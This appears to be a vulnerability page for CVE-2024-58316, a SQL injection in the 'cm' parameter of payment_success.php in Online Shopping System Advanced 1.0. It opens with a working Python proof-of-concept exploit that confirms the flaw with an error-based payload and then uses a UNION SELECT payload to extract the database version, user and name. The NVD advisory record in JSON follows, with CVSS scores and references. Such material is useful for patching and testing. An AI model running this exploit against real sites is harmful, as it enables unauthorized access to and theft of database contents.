CVE-2024-58316

# CVE-2024-58316 SQL Injection PoC # Target: Online Shopping System Advanced 1.0 # Vulnerability: payment_success.php 'cm' parameter import requests import sys target_url = "http://target.com/payment_success.php" # Basic SQL Injection test - detect vulnerability def test_sql_injection(): # Normal request normal_params = {"cm": "12345"} # SQL Injection payload - triggers database error payload_params = {"cm": "12345' OR '1'='1"} try: print(f"[*] Testing target: {target_url}") # Test normal request response1 = requests.get(target_url, params=normal_params, timeout=10) print(f"[+] Normal request status: {response1.status_code}") # Test malicious request response2 = requests.get(target_url, params=payload_params, timeout=10) print(f"[+] Malicious request status: {response2.status_code}") # Check for SQL error indicators if "sql" in response2.text.lower() or "mysql" in response2.text.lower() or "syntax" in response2.text.lower(): print("[!] SQL Injection vulnerability confirmed!") return True else: print("[-] Vulnerability not detected via error-based method") return False except requests.RequestException as e: print(f"[-] Request failed: {e}") return False # Extract data using UNION-based injection def extract_database_info(): # UNION-based payload to extract database version and user payload = "12345' UNION SELECT 1,version(),user(),database(),5,6,7,8,9,10-- -" params = {"cm": payload} try: response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Database info extraction response received") # Parse response to extract database details return response.text except requests.RequestException as e: print(f"[-] Extraction failed: {e}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2024-58316 SQL Injection Exploitation") print("=" * 60) if test_sql_injection(): print("\n[*] Attempting data extraction...") extract_database_info()

{"cve": {"id": "CVE-2024-58316", "sourceIdentifier": "[email protected]", "published": "2025-12-12T21:15:51.430", "lastModified": "2025-12-19T15:27:57.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Online Shopping System Advanced 1.0 contains a SQL injection vulnerability in the payment_success.php script that allows attackers to inject malicious SQL through the unfiltered 'cm' parameter. Attackers can exploit the vulnerability by sending crafted SQL queries to retrieve sensitive database information by manipulating the user ID parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:puneethreddyhc:online_shopping_system_advanced:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "0BD433B1-A992-47F6-9EF6-192200716D71"}]}]}], "references": [{"url": "https://github.com/PuneethReddyHC/online-shopping-system-advanced", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51811", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/online-shopping-system-advanced-sql-injection-via-payment-success-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}